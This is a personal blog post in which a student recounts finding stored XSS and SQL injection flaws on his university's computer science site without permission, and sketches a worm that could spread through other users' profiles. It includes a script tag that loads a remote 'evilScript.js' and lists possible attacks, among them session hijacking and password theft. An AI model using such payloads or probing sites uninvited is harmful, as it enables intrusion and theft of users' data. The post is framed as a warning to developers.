Try ... Finally

Reports on my trails and tribulations

How I hacked a site

30/Aug 2012 By Ivan du Toit

I did no harm so don’t start booing me before you read the whole story, I just went far enough to prove that in fact there was an exploitable security issue - and I must admit also showed off to one of my friends by greeting him by name once he logged into the site. I also reported the vulnerabilities to the appropriate people.

How this came about.


Exam time is a weird time for students, they start experiencing the taste of the holidays while actually performing under the academic pressure of having to pass.

In the middle of my exams I was having problems sleeping due to the stress of the exams. During one of these periods of stress induced insomnia I decided that I would rather be doing something than just lying in bed. So I grabbed my netbook and started to surf the net, at some stage I ended up on the computer science site to check if there was any news related to my course. So there I was 2:30 AM browsing around the site when I had this crazy idea: Is this site secure? I don’t know why I had that thought but there it was and since I wasn’t sleeping anyway, so I decided to give the site a test.

First I had a crack at the user login form but that was hardened against my primitive attacks, but is this true for the whole site or is there some area that the other students before me have not yet checked? So I tried a few of the other forms on the site for SQL injection vulnerabilities but found none but that is to be expected. But what I did find was a XSS vulnerability in the member details form. I could inject a script tag that was not escaped into my surname. But you might say that is not a big deal is it? It seems so innocent to add
<script>alert("Hello World");</script>  
to my surname. But I could also change that to
<script src="example.com/evilScript.js"></script>

Which does not look half as cute does it? After some brain storming I thought of ways to infect other users by updating there details in the back ground to include my script in there surname! This infection happens whenever my surname was rendered by the browser! This boys and girls is a worm similar to the myspace worm! So it has gone viral now what?

No it can not start the zombie apocalypse (I think hope). But it could do all of the following:
  • Session Hijacking
  • Steal passwords 
  • Download other students code for assignments 
  • Steal other students and lecturer’s email address and other hidden personal information.
  • Post content as a lecturer or student.
Pretty scary stuff for suck a innocent vulnerability!
I also found a SQL injection vulnerability but that to me is not very special because it is very common, yet so easy to prevent that I am just astounded that it exists.

Moral of the story


So yeah that is how I hacked a site. I post about the experience both as a warning to other developers and to myself.
  • Innocent looking vulnerabilities can have very grave consequences.
  • Your security is only as strong as your weakest point.
If this post makes just 1 site more secure I will be very happy. So go code but be safe.

Tags// Programming, websites, xss, Hacking, sql injection,
More Reading
Newer// A life of a student
Older// Hello World!

© 2019. All rights reserved.